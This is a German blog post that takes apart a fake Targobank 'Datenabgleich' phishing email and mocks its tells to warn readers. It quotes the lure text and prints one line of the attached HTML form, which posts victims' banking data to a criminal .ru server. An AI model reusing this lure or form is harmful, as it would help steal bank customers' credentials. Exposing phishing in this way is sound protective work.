Targobank – Datenabgleich

Aber ich bin da doch gar nicht Kunde.

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Ab­sender ist ge­fälscht. (Jeder Ab­sender in einer Spam ist ge­fälscht.) Diese E-Mail kommt nicht von der Targo­bank.

Hui, Design!

Ich halte diese Phishing-Spam für ge­fähr­lich, weil sie über­durch­schnitt­lich gut ge­macht ist. Wer Kunde bei der Targo­bank ist und darauf rein­ge­fallen ist, sollte sich so­fort mit der Bank in Ver­bin­dung setzen, um den Schaden zu mini­mieren.

Sehr geehrte Damen und Herren,

Genau mein Name!

Eine richtige Bank würde ihre Kunden natür­lich mit Namen an­sprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch er­wähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im All­ge­meinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zu­ord­nung von Mail­adres­sen zu Bank­da­ten hat – nicht wissen, welche Konto­nummer seine Em­pfänger haben. Ein vor­sich­tiger Umgang mit Bank­da­ten und die Ver­wen­dung einer eigenen E-Mail-Adresse aus­schließ­lich für die Kom­mu­ni­ka­tion mit der Bank sind ein wich­tiger und sehr wirk­samer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht fest­ge­stellt hat, dass ich ohne Grund 20.000 Øre be­rap­pen muss!

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten an­ge­fügte For­mu­lar“ ist eine an die Spam an­ge­hängte HTML-Datei, die im Browser so aus­sehen würde¹:

Das Wich­tig­ste daran ist, wo die ein­ge­gebenen Daten hin­gehen. Diese Frage be­ant­wortet sich leicht durch einen Blick in den Quell­text der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targo­bank, sondern zum Server unter der von Kri­mi­nel­len kon­trol­lier­ten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, wes­halb man der „Targo­bank“ so viele Dinge sagen soll, die die richtige Targo­bank längst kennt, wenn man dort Kunde ist, zum Bei­spiel die eigene Kon­to­nummer. Allein die hier an­ge­ge­benen Daten reichen für die Über­nahme des Kontos durch die Kri­mi­nellen, und ich bin mir sicher, dass nach dem Ab­sen­den noch weitere Daten für eine an­geb­liche „Sicher­heits­prü­fung“ ab­ge­fragt werden – sehr be­liebt sind wegen ihrer „viel­sei­ti­gen kri­mi­nel­len Ver­wend­bar­keit“ Kre­dit­karten­daten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf rein­zu­fallen, wird er mit techno­kra­tischen Ent­gelt-For­de­rungen ge­fü­gig ge­macht – so frei nach dem Motto: „Wir haben ein Sicher­heits­pro­blem, zahlen sie bitte grund­los zwan­zig Euro. Die Ge­büh­ren­ta­belle, nach der wir dieses Geld er­he­ben, haben wir uns ein­fach aus dem Hin­tern ge­zo­gen“.

Es handelt sich übrigens um langsame Ver­brecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto raus­ge­holt haben, was sie raus­holen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden er­reich­bar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Sub­ti­li­täten sie nicht ver­stehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ ge­schrie­ben und nicht das irre­führende Er­geb­nis aus einer Com­puter­über­set­zung ver­wendet.

Es ist wieder ein­mal wie so oft bei den Phishing-Spams: Wenn der ei­gent­liche Phishing-Kram for­mu­liert ist, werden die Spammer oft ein wenig nach­läs­sig und ihnen pas­sie­ren kleine und zu­wei­len auch große und sehr pein­liche Fehler. Wer sich nicht in Panik ver­setzen lässt (Sicher­heits­maß­nahme der Bank, das wird teuer, wenn ich nicht rea­giere) und gründ­lich liest, wird bei­nahe jede Phishing-Spam an sol­chen De­tails er­kennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht be­merkt hat: Die Targo­bank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Ver­brech­ern, die ihre krimi­nellen Ge­schäfte mit frem­den Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten ver­pras­sen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage…

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.